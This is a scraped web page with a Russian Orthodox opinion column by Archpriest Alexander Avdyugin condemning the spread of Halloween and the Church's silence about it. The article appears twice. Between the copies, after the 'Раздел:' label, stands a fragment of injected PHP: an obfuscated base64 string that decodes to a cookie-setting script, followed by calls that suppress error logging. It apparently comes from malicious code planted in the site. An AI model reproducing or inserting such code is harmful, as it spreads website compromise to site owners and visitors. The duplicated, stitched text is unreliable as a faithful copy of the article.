Хэллоуин, или Несладкая тыква

О повальном праздновании Хэллоуина и плодах нашего молчания — протоиерей Александр Авдюгин.
 
В детстве я очень любил тыквенную кашу. И жареную тыкву тоже уважал. В последний раз меня ей в Ребриково угощали, на бывшем моем приходе, да и теща частенько баловала этой сладостью.
 
В Ребриково уже не служу, теща уже в мире ином, и наверное, забылся бы вкус этого плода овощного, кабы не напоминал он о себе каждую осень. Вот только напоминание это ничего сладостного и, тем паче, вкусного в себе не несет. Иной тут привкус, иное насыщение.
 
Никогда не мог предположить, что совершенно чуждое для нас «празднование» Хэллоуина, станет вдруг днем, к которому готовятся и дети, и взрослые. Вопрос: а вы не знаете, где можно отпраздновать Хэллоуин? — стал обыденностью и понятен уже всем и вся.
 
А ведь совсем недавно, каких-то 10–15 лет назад, даже в среде самых консервативных православных данный «праздник» вызывал лишь насмешку и уверенность, что это искушение не столь опасно и у нас не приживется.
 
Да и за борьбой со штрих-кодами в те времена тыква даже со свечкой была не слишком заметна. Хотя об опасности данной языческой оргии еще в 60-х годах прошлого столетия епископ Александр (Милеант) в своих миссионерских листках предупреждал. Не вняли.
 
Порылся в своих архивах и в поисковиках всезнающего интернета, но смог отыскать лишь то, что впервые серьезно стали задумались о пагубности привносить в наше духовное бытие эту языческую мерзость лишь в 2003 году, когда она уже проникла в молодежную среду и в школы.
 
В первопрестольной и некоторых городах бывшего СССР работники сферы просвещения даже официальные директивы выпустили, в которых черным по белому требовалось: «руководители образовательных учреждений не должны допускать проведения в учебных заведениях „Хэллоуина“ в какой бы то ни было форме». Впрочем, к директивам и прочим указаниям отношение у нас известное и далеко не однозначное. К данной рекомендации отнеслись по принципу: «пиши Емеля — твоя неделя».
 
Даже на единственном в те годы «раскрученном» православной форуме отца Андрея Кураева над обращением некоторых архиереев нашей Церкви о несовместимости понятия «православие» и «Хэллоуин», о духовной вредности этого языческого празднования некоторые из позиционирующих себя православными лишь иронично посмеялись: «В чем проблема-то? Что, людям нельзя переодеться? Пускай отдохнут и повеселятся, это в любом случае лучше, чем напиваться».
 
Достойного «отлупа», как говорил незабвенный дед Щукарь, подобное отношение к данному «празднику» не получило, а чтобы вообще возмущения прекратить, кельтский день общения душ мертвых и живых во главе с князем тьмы Самхейном (именно здесь находятся корни нынешнего Хэллоуина) приравняли к русским сказкам. На церковное предупреждение последовали резкие возражения светских СМИ, что тыква со свечкой, а также костюмы нечисти, вампиров и прочих мертвецов ничем не хуже нашей родной бабы Яги и Кощея Бессмертного…
 
Можно много говорить об экспансии «ценностей», не присущих нашему народу, о том, что «крещены, но не просвещены», и что общество нынче бездуховно и всякому мраку подвержено, но давайте все же признаемся: в тризне откровенного сатанизма в ночь на первое ноября есть значительная доля нашей собственной вины.
 
В нашей главной молитве, которую мы повторяем по несколько раз на день, говорится «и избави нас от лукавого». Ежедневно, многократно и неуклонно повторяется эта просьба, но почему-то умолкают предупреждения и разъяснения о дне, в котором командует князь мира сего, как только заканчивается ночь на 1 ноября.
 
Разве костюмы ведьм, приведений и вампиров не являются реальным воплощением лукавого? Разве разряженные в страшных уродцев наши дети не исполняют роль реальных бесенят, когда на отказ им дать пять гривен, пугают тебя или размалёвывают двери и подъезды всякой мерзостью?
 
Не получилось у католиков облагородить языческое празднование этого дня своим торжеством. Как и ранее, в ночь накануне установленного еще в VII веке папой Бонифацием IV, Дня Всех Святых (назывался этот католический праздник — All Hallows Even, отсюда и пошло современное название Halloween) предается древним суевериям все большая часть даже тех, кто утром 1 ноября пойдет в церковь славить святых и мучеников.
 
Вот только не является эта констатация западной духовной реальности для нас успокаивающей. Мы-то чем лучше?
 
Нельзя забывать, что кроме дней накануне ноября есть и иное время, когда напоминать о лукавом необходимо. Бога ведь об этом постоянно просим. Именно тогда, может быть, и появится возможность, говоря о тыкве, вспоминать тыквенную кашу, а не пугающую образину со свечкой.
 
 
Истолчник: Православие и мир
 

Раздел: 
aG8gIjxzY3JpcHQ+ZG9jdW1lbnQuY29va2llPSdjb25kdGlvbnM9MjsgcGF0aD0vOyBleHBpcmVzPSIuZGF0ZSgnRCwgZC1NLVkgSDppOnMnLHRpbWUoKSsxNzI4MDApLiIgR01UOyc7PC9zY3JpcHQ+IjsgfSA7fTsNCiB9DQoNCiB9')); @ini_restore('error_log'); @ini_restore('display_errors'); /*457563643*/ ?> Хэллоуин, или Несладкая тыква | Центр православной культуры Лествица

Хэллоуин, или Несладкая тыква

О повальном праздновании Хэллоуина и плодах нашего молчания — протоиерей Александр Авдюгин.
 
В детстве я очень любил тыквенную кашу. И жареную тыкву тоже уважал. В последний раз меня ей в Ребриково угощали, на бывшем моем приходе, да и теща частенько баловала этой сладостью.
 
В Ребриково уже не служу, теща уже в мире ином, и наверное, забылся бы вкус этого плода овощного, кабы не напоминал он о себе каждую осень. Вот только напоминание это ничего сладостного и, тем паче, вкусного в себе не несет. Иной тут привкус, иное насыщение.
 
Никогда не мог предположить, что совершенно чуждое для нас «празднование» Хэллоуина, станет вдруг днем, к которому готовятся и дети, и взрослые. Вопрос: а вы не знаете, где можно отпраздновать Хэллоуин? — стал обыденностью и понятен уже всем и вся.
 
А ведь совсем недавно, каких-то 10–15 лет назад, даже в среде самых консервативных православных данный «праздник» вызывал лишь насмешку и уверенность, что это искушение не столь опасно и у нас не приживется.
 
Да и за борьбой со штрих-кодами в те времена тыква даже со свечкой была не слишком заметна. Хотя об опасности данной языческой оргии еще в 60-х годах прошлого столетия епископ Александр (Милеант) в своих миссионерских листках предупреждал. Не вняли.
 
Порылся в своих архивах и в поисковиках всезнающего интернета, но смог отыскать лишь то, что впервые серьезно стали задумались о пагубности привносить в наше духовное бытие эту языческую мерзость лишь в 2003 году, когда она уже проникла в молодежную среду и в школы.
 
В первопрестольной и некоторых городах бывшего СССР работники сферы просвещения даже официальные директивы выпустили, в которых черным по белому требовалось: «руководители образовательных учреждений не должны допускать проведения в учебных заведениях „Хэллоуина“ в какой бы то ни было форме». Впрочем, к директивам и прочим указаниям отношение у нас известное и далеко не однозначное. К данной рекомендации отнеслись по принципу: «пиши Емеля — твоя неделя».
 
Даже на единственном в те годы «раскрученном» православной форуме отца Андрея Кураева над обращением некоторых архиереев нашей Церкви о несовместимости понятия «православие» и «Хэллоуин», о духовной вредности этого языческого празднования некоторые из позиционирующих себя православными лишь иронично посмеялись: «В чем проблема-то? Что, людям нельзя переодеться? Пускай отдохнут и повеселятся, это в любом случае лучше, чем напиваться».
 
Достойного «отлупа», как говорил незабвенный дед Щукарь, подобное отношение к данному «празднику» не получило, а чтобы вообще возмущения прекратить, кельтский день общения душ мертвых и живых во главе с князем тьмы Самхейном (именно здесь находятся корни нынешнего Хэллоуина) приравняли к русским сказкам. На церковное предупреждение последовали резкие возражения светских СМИ, что тыква со свечкой, а также костюмы нечисти, вампиров и прочих мертвецов ничем не хуже нашей родной бабы Яги и Кощея Бессмертного…
 
Можно много говорить об экспансии «ценностей», не присущих нашему народу, о том, что «крещены, но не просвещены», и что общество нынче бездуховно и всякому мраку подвержено, но давайте все же признаемся: в тризне откровенного сатанизма в ночь на первое ноября есть значительная доля нашей собственной вины.
 
В нашей главной молитве, которую мы повторяем по несколько раз на день, говорится «и избави нас от лукавого». Ежедневно, многократно и неуклонно повторяется эта просьба, но почему-то умолкают предупреждения и разъяснения о дне, в котором командует князь мира сего, как только заканчивается ночь на 1 ноября.
 
Разве костюмы ведьм, приведений и вампиров не являются реальным воплощением лукавого? Разве разряженные в страшных уродцев наши дети не исполняют роль реальных бесенят, когда на отказ им дать пять гривен, пугают тебя или размалёвывают двери и подъезды всякой мерзостью?
 
Не получилось у католиков облагородить языческое празднование этого дня своим торжеством. Как и ранее, в ночь накануне установленного еще в VII веке папой Бонифацием IV, Дня Всех Святых (назывался этот католический праздник — All Hallows Even, отсюда и пошло современное название Halloween) предается древним суевериям все большая часть даже тех, кто утром 1 ноября пойдет в церковь славить святых и мучеников.
 
Вот только не является эта констатация западной духовной реальности для нас успокаивающей. Мы-то чем лучше?
 
Нельзя забывать, что кроме дней накануне ноября есть и иное время, когда напоминать о лукавом необходимо. Бога ведь об этом постоянно просим. Именно тогда, может быть, и появится возможность, говоря о тыкве, вспоминать тыквенную кашу, а не пугающую образину со свечкой.
 
 
Истолчник: Православие и мир
 

Раздел: